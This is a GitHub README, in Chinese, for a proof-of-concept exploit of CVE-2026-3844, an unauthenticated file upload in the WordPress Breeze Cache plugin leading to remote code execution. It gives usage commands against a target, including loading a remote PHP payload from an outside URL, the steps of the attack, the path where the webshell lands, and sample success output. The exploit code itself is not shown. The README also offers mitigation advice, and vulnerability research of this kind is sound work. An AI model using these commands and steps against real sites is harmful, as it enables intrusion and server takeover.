sahmsec/CVE-2026-3844

GitHub: sahmsec/CVE-2026-3844

针对 WordPress Breeze Cache 插件 2.4.4 及以下版本未认证文件上传漏洞的完整利用 PoC,支持从漏洞检测到远程代码执行验证的全流程。

Stars: 0 | Forks: 0

# CVE-2026-3844 — WordPress Breeze Cache 未认证文件上传 ## 概述 本仓库包含一个 Python 概念验证 (PoC) 脚本,用于演示影响 **WordPress Breeze Cache 插件 <= 2.4.4** 的**未认证任意文件上传**漏洞。 ## 漏洞信息 * **CVE ID:** CVE-2026-3844 * **受影响插件:** Breeze Cache for WordPress * **受影响版本:** <= 2.4.4 * **问题类型:** 未认证任意文件上传 * **影响:** 潜在的远程代码执行 (RCE) * **攻击向量:** 远程 / 未认证 该漏洞滥用 Breeze Cache 的 Gravatar 缓存功能,将攻击者控制的文件存储到 WordPress 缓存目录中。 ## 功能 * 漏洞检测模式 * 自动化利用工作流 * Webshell 验证支持 * 彩色终端输出 * 远程 payload 加载 * 上传验证检查 * 可选输出日志记录 ## 环境要求 * Python 3.8+ * `pycurl` * `termcolor` 安装依赖: ``` pip install pycurl termcolor ``` ## 文件 | 文件 | 描述 | | -------------------- | --------------------------- | | `CVE-2026-3844.py` | 主要 PoC 利用脚本 | | `CVE-2026-3844.yaml` | YAML 模板/配置 | ## 用法 ### 检查目标是否看起来存在漏洞 ``` python3 CVE-2026-3844.py -u http://target.com --check-only ``` ### 运行利用程序 ``` python3 CVE-2026-3844.py -u http://target.com ``` ### 自定义 Payload ``` python3 CVE-2026-3844.py -u http://target.com -p https://example.com/payload.php ``` ### 保存结果 ``` python3 CVE-2026-3844.py -u http://target.com -o results.txt ``` ## 工作原理 该脚本执行以下步骤: 1. 检测已安装的 Breeze Cache 版本 2. 检查插件版本是否存在漏洞 3. 提交构造的 WordPress 评论请求 4. 滥用 Breeze Cache 的 Gravatar 处理机制 5. 等待缓存生成 6. 验证上传的文件是否可访问 7. 测试 payload 响应情况 ## 漏洞路径 上传的 payload 可能可以通过以下路径访问: ``` /wp-content/cache/breeze-extra/gravatars/ ``` ## 备注 成功利用可能取决于是否启用了以下 Breeze 设置: ``` Host Files Locally - Gravatars ``` 如果该功能被禁用,利用尝试可能会失败。 ## 示例输出 ``` [+] Target VULNERABLE (Breeze v2.4.4) [+] Comment posted successfully [+] File found at: http://target.com/wp-content/cache/breeze-extra/gravatars/random.php [+] VERIFICATION STRING FOUND - EXPLOIT SUCCESSFUL! ``` ## 免责声明 本仓库提供用于: * 安全研究 * 教育目的 * 授权渗透测试 * 防御性安全评估 请勿将此项目用于您不拥有或未获得明确测试授权的系统。 作者对本项目的滥用或造成的损害不承担任何责任。 ## 缓解建议 网站管理员应: * 将 Breeze Cache 更新到最新的修补版本 * 禁用不必要的文件缓存功能 * 限制危险的文件上传 * 禁用缓存目录中的 PHP 执行 * 监控 `/wp-content/cache/` 中的可疑文件 * 部署 Web Application Firewall (WAF) * 实施严格的服务端验证 ## 教育目的声明 创建此概念验证旨在帮助: * 安全研究人员 * 渗透测试人员 * 蓝队 * WordPress 管理员 * 开发人员 了解与不安全缓存机制和任意文件上传相关的安全风险。 ## 参考 * CVE 数据库 * WordPress 安全公告 * OWASP 文件上传安全指南 * Breeze Cache 插件文档 ## 作者 安全研究 / 教育项目
标签:Breeze Cache, CISA项目, CVE, CVE-2026-3844, Exploit, Gravatar缓存, Maven, PoC, Python, RCE, Webshell, Web安全, WordPress, 任意文件上传, 提示词注入, 数字签名, 无后门, 暴力破解, 未授权漏洞, 漏洞验证, 编程工具, 网络安全, 自动化利用, 蓝队分析, 远程代码执行, 逆向工具, 隐私保护